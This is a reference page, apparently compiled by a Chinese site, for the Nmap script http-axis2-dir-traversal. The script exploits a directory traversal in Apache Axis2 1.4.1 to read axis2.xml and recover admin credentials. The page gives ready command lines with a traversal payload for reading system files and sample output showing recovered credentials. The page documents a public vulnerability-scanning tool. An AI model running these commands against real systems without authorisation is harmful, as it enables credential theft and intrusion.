http-axis2-dir-traversal
脚本使用类型:
portrule
脚本所属分类:
vuln, intrusive, exploit
脚本下载地址: http://nmap.org/svn/scripts/http-axis2-dir-traversal.nse
Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd
(OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service '/conf/axis2.xml'
using the path '/axis2/services/'
to return the username and password of the admin account.
To exploit this vulnerability we need to detect a valid service running on the installation so we extract it from /listServices
before exploiting the directory traversal vulnerability.
By default it will retrieve the configuration file, if you wish to retrieve other files you need to set the argument http-axis2-dir-traversal.file
correctly to traverse to the file's directory. Ex. ../../../../../../../../../etc/issue
To check the version of an Apache Axis2 installation go to: http://domain/axis2/services/Version/getVersion
Reference:
Remote file to retrieve
Output file
Basepath to the services page. Default: /axis2/services/
Other useful arguments for this script:
User Agent used in the GET requests
执行格式
nmap -p80,8080 --script http-axis2-dir-traversal --script-args 'http-axis2-dir-traversal.file=../../../../../../../etc/issue' <host/ip> nmap -p80 --script http-axis2-dir-traversal <host/ip>
80/tcp open http syn-ack |_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2
Author: Paulino Calderon
License: VER007 整理 http://www.ver007.com